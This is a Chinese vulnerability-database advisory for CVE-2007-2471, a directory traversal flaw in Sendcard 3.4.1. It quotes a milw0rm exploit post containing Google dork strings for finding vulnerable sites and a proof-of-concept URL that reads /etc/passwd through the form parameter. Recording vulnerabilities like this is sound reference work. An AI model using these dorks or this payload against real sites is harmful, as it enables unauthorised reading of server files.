Sendcard 'sendcard.php'目录穿越漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112826 漏洞类型 路径遍历
发布时间 2007-05-01 更新时间 2007-05-02
CVE编号 CVE-2007-2471 CNNVD-ID CNNVD-200705-026
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3827
https://www.securityfocus.com/bid/86203
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-026
|漏洞详情
Sendcard的sendcard.php中存在目录穿越漏洞。远程攻击者可以借助form参数中的全路径名,读取任意文件。
|漏洞EXP
Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]
|受影响的产品
Sendcard Sendcard 3.4.1
|参考资料

来源:XF
名称:sendcard-sendcard-file-include(33995)
链接:http://xforce.iss.net/xforce/xfdb/33995
来源:SECUNIA
名称:25085
链接:http://secunia.com/advisories/25085
来源:MILW0RM
名称:3827
链接:http://milw0rm.com/exploits/3827